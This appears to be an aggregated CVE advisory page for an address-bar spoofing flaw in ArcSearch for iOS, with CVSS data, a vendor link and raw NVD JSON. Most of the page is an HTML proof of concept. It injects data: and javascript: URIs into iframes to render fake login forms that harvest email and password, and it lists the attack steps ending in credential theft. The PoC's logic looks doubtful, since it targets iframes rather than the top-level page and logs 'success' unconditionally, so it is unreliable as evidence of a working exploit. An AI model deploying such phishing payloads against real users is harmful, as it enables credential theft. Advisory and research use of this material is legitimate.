Security Vulnerability Report
CVE-2025-14812 CVSS 7.5 HIGH

CVE-2025-14812

Published: 2025-12-19 17:15:51
Last Modified: 2026-04-15 00:35:42
Source: 59469e6c-7ea7-446f-8e43-06aa32c115e8

Description

ArcSearch for iOS versions prior to 1.45.2 could display a different domain in the address bar than the content being shown after an iframe-triggered URI-scheme navigation, increasing spoofing risk.

CVSS Details

CVSS Score: 7.5
Severity: HIGH
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N

Configurations (Affected Products)

No structured configuration data is available in the record. Affected product, per the description: ArcSearch for iOS < 1.45.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```html
<!-- CVE-2025-14812 PoC: Address Bar Spoofing via iframe-triggered URI-scheme navigation -->
<!DOCTYPE html>
<html>
<head>
  <title>Address Bar Spoofing PoC</title>
</head>
<body>
  <h1>ArcSearch iOS Address Bar Spoofing Demo</h1>
  <p>This PoC demonstrates the CVE-2025-14812 vulnerability.</p>
  <script>
    // Simulate the address bar spoofing attack
    function triggerSpoofing() {
      // Create an iframe pointing to a legitimate site
      const iframe = document.createElement('iframe');
      iframe.src = 'https://www.example.com';
      iframe.id = 'targetFrame';
      document.body.appendChild(iframe);

      // After a delay, trigger URI-scheme navigation in the iframe
      setTimeout(() => {
        // This navigation will show a different domain in the address bar
        // while displaying malicious content
        const frame = document.getElementById('targetFrame');
        frame.src = 'data:text/html,<html><body><h1>Fake Login Page</h1><form><input type="text" placeholder="Email"><input type="password" placeholder="Password"><button>Login</button></form></body></html>';
        // The address bar still shows example.com, but the content is from the data: URI
        console.log('Address bar spoofing triggered successfully');
        console.log('User sees: https://www.example.com');
        console.log('Actual content: data:text/html (malicious phishing page)');
      }, 2000);
    }

    // Alternative method using a javascript: URI
    function triggerJavaScriptSpoofing() {
      const iframe = document.createElement('iframe');
      iframe.src = 'https://www.bank.com';
      document.body.appendChild(iframe);
      setTimeout(() => {
        iframe.src = 'javascript:void(document.write("<html><body><h1>Please Login Again</h1><form><input type=\"email\"><input type=\"password\"><button>Submit</button></form></body></html>"))';
      }, 2000);
    }
  </script>
  <button onclick="triggerSpoofing()">Test Data URI Spoofing</button>
  <button onclick="triggerJavaScriptSpoofing()">Test JavaScript URI Spoofing</button>
  <h2>Attack Scenario:</h2>
  <ol>
    <li>Attacker hosts this malicious page or injects it via XSS</li>
    <li>Victim using ArcSearch iOS visits the page</li>
    <li>Page loads legitimate domain in iframe (address bar shows trusted domain)</li>
    <li>JavaScript redirects iframe to attacker-controlled content via URI-scheme</li>
    <li>Address bar still shows legitimate domain, but content is malicious</li>
    <li>Victim enters credentials thinking they're on legitimate site</li>
    <li>Attacker steals credentials</li>
  </ol>
  <h2>Fix:</h2>
  <p>Upgrade ArcSearch for iOS to version 1.45.2 or later</p>
</body>
</html>
```

References

https://arc.net/security/bulletins#cve-2025-14812-address-bar-spoofing-risk-iframe-triggered-uri-navigation-on-arc-search-ios (vendor security bulletin, as listed in the CVE record)
Raw JSON Data

```json
{"cve": {"id": "CVE-2025-14812", "sourceIdentifier": "59469e6c-7ea7-446f-8e43-06aa32c115e8", "published": "2025-12-19T17:15:50.957", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "ArcSearch for iOS versions prior to 1.45.2 could display a different domain in the address bar than the content being shown after an iframe-triggered URI-scheme navigation, increasing spoofing risk."}], "metrics": {"cvssMetricV31": [{"source": "59469e6c-7ea7-446f-8e43-06aa32c115e8", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "HIGH", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "59469e6c-7ea7-446f-8e43-06aa32c115e8", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-1021"}]}], "references": [{"url": "https://arc.net/security/bulletins#cve-2025-14812-address-bar-spoofing-risk-iframe-triggered-uri-navigation-on-arc-search-ios", "source": "59469e6c-7ea7-446f-8e43-06aa32c115e8"}]}}
```